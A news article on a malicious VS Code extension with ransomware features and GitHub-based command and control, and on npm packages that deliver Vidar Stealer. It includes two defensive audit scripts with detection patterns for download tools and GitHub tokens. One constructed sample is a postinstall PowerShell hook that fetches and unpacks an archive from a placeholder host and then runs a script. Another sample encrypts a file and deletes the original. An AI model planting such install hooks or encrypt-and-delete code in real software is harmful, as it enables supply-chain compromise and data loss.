
Vibe-Coded Malicious: Uncovering the Dangerous Code Extension with Ransomware Features


Cybersecurity Researchers Uncover Malicious VS Code Extension with Ransomware Capabilities

A recent discovery by cybersecurity researchers has brought to light a malicious Visual Studio Code (VS Code) extension that possesses basic ransomware capabilities. What sets this extension apart is that it appears to have been developed with the assistance of artificial intelligence, a technique known as vibe-coding.

John Tuckner, a researcher at Secure Annex, was the first to flag the extension named “susvsex.” Interestingly, the extension does not make any efforts to conceal its malicious intent. Uploaded on November 5, 2025, by a user going by the name “suspublisher18,” the extension came with a simple description – “Just testing,” and an email address “donotsupport@example[.]com.”

The extension’s description reveals its functionality – “Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch.” Microsoft promptly intervened on November 6 to remove the extension from the official VS Code Extension Marketplace.

According to details provided by “suspublisher18,” the extension is programmed to activate itself automatically in response to any event, including installation or launching of VS Code. It triggers a function called “zipUploadAndEncrypt,” which creates a ZIP archive of a specified directory, sends it to a remote server, and replaces the original files with encrypted versions.

Tuckner reassures that the targeted directory is currently a test staging area, minimizing the impact. However, he warns that the directory can easily be updated with a new extension release or through commands sent via the C2 channel.

GitHub Utilized as Command-and-Control (C2) Server

In addition to encryption, the malicious extension leverages GitHub as its command-and-control (C2) server by monitoring a private GitHub repository for new commands to execute. The commands are extracted from the “index.html” file, and the results of their execution are written back to the same repository in the “requirements.txt” file using a GitHub access token embedded within the code.
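The traits described above for the extension (activation on every event, a GitHub access token baked into the bundle, reads and writes against a repository's contents, and an encrypt-then-replace file loop) can all be checked statically from the extension's `package.json` and its main script. The following audit is an added example written for this article; it is not code from Secure Annex, from Microsoft, or from the extension itself. The manifest and source text it inspects are constructed, the token is an all-zero dummy, and the regexes encode the documented GitHub token prefixes (`ghp_` and friends, `github_pat_`) and the contents API path.

```javascript
// Added example (not from the article, Secure Annex, or the extension itself): a
// static audit of a VS Code extension for the traits the text describes:
// activation on every event, a hard-coded GitHub token, repository contents API
// access, and an encrypt-and-replace file flow. Sample inputs are constructed.

// GitHub credential shapes: classic personal access tokens start with "ghp_"
// (the other gh?_ prefixes cover OAuth, user, server and refresh tokens);
// fine-grained tokens start with "github_pat_". The extension's real token is
// not on the page, so the sample source below uses an all-zero placeholder.
const GITHUB_TOKEN_RE = /\b(?:gh[pousr]_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b/g;
const GITHUB_API_RE = /api\.github\.com\/repos\/[\w.-]+\/[\w.-]+\/contents\//;

function auditExtension(manifest, sourceText) {
  const findings = [];
  const events = Array.isArray(manifest.activationEvents) ? manifest.activationEvents : [];

  // "*" activates the extension as soon as VS Code starts, whatever the user does.
  if (events.includes('*')) {
    findings.push({ severity: 'high', id: 'broad-activation',
      detail: 'activationEvents contains "*": code runs on every launch' });
  } else if (events.includes('onStartupFinished')) {
    findings.push({ severity: 'medium', id: 'startup-activation',
      detail: 'activates after every startup rather than on a user action' });
  }

  // A credential shipped in the bundle: a GitHub-backed C2 channel needs one to read and write the repo.
  const tokens = sourceText.match(GITHUB_TOKEN_RE) || [];
  if (tokens.length > 0) {
    findings.push({ severity: 'high', id: 'embedded-github-token',
      detail: `${tokens.length} GitHub-token-shaped string(s) in source` });
  }

  // Reading or writing repository contents from inside an editor extension is unusual enough to review.
  if (GITHUB_API_RE.test(sourceText)) {
    findings.push({ severity: 'medium', id: 'github-contents-api',
      detail: 'calls the GitHub repository contents API' });
  }

  // Encryption combined with rewriting or deleting files matches the zip/upload/encrypt flow.
  const touchesFiles = /\bfs\.(?:unlinkSync|rmSync|writeFileSync)\b/.test(sourceText);
  const encrypts = /\bcrypto\.createCipheriv\b/.test(sourceText);
  if (touchesFiles && encrypts) {
    findings.push({ severity: 'high', id: 'encrypt-and-replace',
      detail: 'encrypts with createCipheriv and rewrites or deletes files' });
  }
  return findings;
}

// Constructed sample manifest and source mirroring the traits described in the text.
const SAMPLE_MANIFEST = {
  name: 'sample-ext', version: '0.0.1', description: 'Just testing',
  activationEvents: ['*'], main: './extension.js',
};
const SAMPLE_SOURCE = [
  `const token = "${'ghp_' + '0'.repeat(36)}"; // dummy placeholder, not a real token`,
  'const cmdUrl = "https://api.github.com/repos/owner/repo/contents/index.html";',
  'const cipher = crypto.createCipheriv("aes-256-cbc", key, iv);',
  'fs.writeFileSync(file + ".enc", cipher.update(data)); fs.unlinkSync(file);',
].join('\n');

// One line per finding, for a reviewer's report.
function summarize(findings) {
  return findings.map(f => `${f.severity.toUpperCase()} ${f.id}: ${f.detail}`);
}

console.log(summarize(auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCE)).join('\n'));
```

To run this against a real extension, read the `package.json` from the extension directory and pass the text of the file named in its `main` field (or the concatenated bundle) as `sourceText`. None of these findings alone proves malice (build tools legitimately call the GitHub API, and some extensions do need startup activation), but a marketplace upload that trips three or four of them at once is exactly the profile described above.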


The GitHub account linked to the repository, aykhanmv, remains active, with the purported developer claiming to be based in Baku, Azerbaijan.

Vidar Infostealer Distributed Through Trojanized npm Packages

Meanwhile, Datadog Security Labs uncovered 17 npm packages that masquerade as legitimate software development kits (SDKs) but covertly deploy the Vidar Stealer on compromised systems. This marks the first instance of the information stealer being disseminated via the npm registry.

Identified under the name MUT-4831, these packages were initially flagged on October 21, 2025, with subsequent uploads traced to the following day and October 26. The packages were published by accounts under the names “aartje” and “saliii229911.” Some of the package names include abeya-tg-api, bael-god-admin, cursor-ai-fork, and more.

Although the associated accounts have been banned, these libraries were downloaded at least 2,240 times before their removal. Datadog suspects that many of these downloads could have been automated.

The attack methodology involves a postinstall script specified in the “package.json” file that fetches a ZIP archive from an external server (bullethost[.]cloud domain) and executes the Vidar executable contained within. Some variations utilize a post-install PowerShell script within the package.json file to download the ZIP archive before passing control to a JavaScript file for further execution.
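Because npm runs `preinstall`, `install`, `postinstall` and `prepare` scripts automatically, the fetch-a-ZIP-and-run-it pattern described above is visible in `package.json` before any of the package's code is ever imported. The audit below is an added example written for this article, not tooling from Datadog Security Labs or from npm. Both manifests it inspects are constructed, and `example.invalid` stands in for the real hosting domain named in the text.

```javascript
// Added example (not from the article or Datadog Security Labs): flag npm
// install-time lifecycle scripts that download, unpack or run things, the
// pattern the text describes for the MUT-4831 packages. Sample manifests are
// constructed; "example.invalid" stands in for the real hosting domain.

// Scripts npm runs on its own during install, before any code is imported.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Substrings that turn an install hook from "review" into "block".
const INDICATORS = [
  { id: 'network-fetch',   re: /\b(?:curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|Start-BitsTransfer)\b/i },
  { id: 'powershell',      re: /\b(?:powershell|pwsh)(?:\.exe)?\b/i },
  { id: 'archive-extract', re: /\b(?:Expand-Archive|unzip|tar\s+-?x)/i },
  { id: 'spawns-script',   re: /\b(?:node|bash|sh|cmd)\b\s+\S+/i },
];
const URL_RE = /https?:\/\/[^\s"'`)]+/gi;

// Returns one finding per install hook present, with the indicators it matched,
// the hosts it contacts, and a coarse risk level.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = INDICATORS.filter(p => p.re.test(command)).map(p => p.id);
    const hosts = [];
    for (const u of command.match(URL_RE) || []) {
      try { hosts.push(new URL(u).hostname); } catch { /* not a parseable URL */ }
    }
    // Any install hook deserves a look; one that fetches or shells out is a red flag.
    const risk = indicators.includes('network-fetch') || indicators.includes('powershell') || hosts.length > 0
      ? 'high' : indicators.length > 0 ? 'medium' : 'low';
    findings.push({ hook, command, indicators, hosts, risk });
  }
  return findings;
}

// Constructed manifest shaped like the trojanized SDKs: a PowerShell postinstall
// downloads and unpacks an archive, then hands off to a bundled script.
const SAMPLE_TROJANIZED = {
  name: 'sample-sdk', version: '1.0.0',
  scripts: {
    postinstall: 'powershell -Command "Invoke-WebRequest https://example.invalid/sdk.zip -OutFile sdk.zip; Expand-Archive sdk.zip -DestinationPath ." && node dist/run.js',
  },
};

// Constructed manifest for a native addon: an install hook, but a routine one.
const SAMPLE_NATIVE_ADDON = {
  name: 'sample-native', version: '2.3.1',
  scripts: { install: 'node-gyp rebuild', test: 'mocha' },
};

function report(pkg) {
  return auditLifecycleScripts(pkg).map(f =>
    `[${f.risk.toUpperCase()}] ${pkg.name} ${f.hook}: ${f.indicators.join(', ') || 'no indicators'}` +
    (f.hosts.length ? ` -> ${f.hosts.join(', ')}` : ''));
}

console.log(report(SAMPLE_TROJANIZED).concat(report(SAMPLE_NATIVE_ADDON)).join('\n'));
```

Run this over the `package.json` of every dependency in `node_modules` (or over the tarball before installing) and gate CI on any `high` finding. Independently of the audit, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle scripts from running at all, which neutralizes this delivery mechanism at the cost of having to build native addons explicitly.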

The discovery underscores the ongoing threat of supply chain attacks targeting open-source ecosystems like npm, PyPI, RubyGems, and Open VSX. Developers are advised to exercise caution, review changelogs, and remain vigilant against techniques such as typosquatting and dependency confusion when installing packages.
